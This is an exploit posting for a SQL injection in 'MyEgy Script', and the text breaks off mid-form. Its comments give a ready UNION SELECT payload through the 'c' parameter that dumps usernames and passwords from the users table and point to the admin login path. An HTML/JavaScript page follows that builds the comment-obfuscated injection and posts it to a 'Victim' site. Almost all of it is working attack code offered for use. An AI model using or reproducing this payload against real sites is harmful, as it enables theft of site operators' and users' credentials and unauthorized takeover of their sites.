MyEgy Script SQL Injection

`<html>  
<!--  
Script Name :MyEgy Script  
Authur : Karar alShaMi & Sheko (El3akrab Elmodamer)  
Email : [email protected] , [email protected]  
Demo : http://www.7obonlin.com  
Exploit : Write the site in (Victim) field then submit the form :)  
AdminCp : /?do=login  
Note : each color of myegy script have a different columns number so try to change the (Columns number) field  
to 6 or 7 or 9 if the exploit failed with 8 :)  
Note 2 : We Can Use Get Method To Exploit This Vulnerability  
See line 64 $cat = $_REQUEST['c'];  
So we Can Exploit it in this way  
http://localhost/myegy/?c=[Sql]  
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--  
//-->  
<head><title>MyEgy Explo!t</title>  
<style type="text/css">  
..style1 {  
text-align: center;  
}  
</style>  
</head>  
<body>  
<script language="Javascript">  
function doit(si,co){  
for(var n =1;n<co;n++){  
if(tmp){  
var tmp = tmp+n+",";  
}else{  
var tmp = n+",";  
}  
}  
tmp =tmp.replace(5,"concat(name,0x3a,password)");  
document.f0.action=si+'/';  
document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';  
document.f0.submit;  
}  
</script>  
<form name="f0" method="post">  
<p class="style1">My Egy Explo!t</p>  
<p class="style1">By : Karar alShaMi & Sheko</p>  
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="  
  
  
`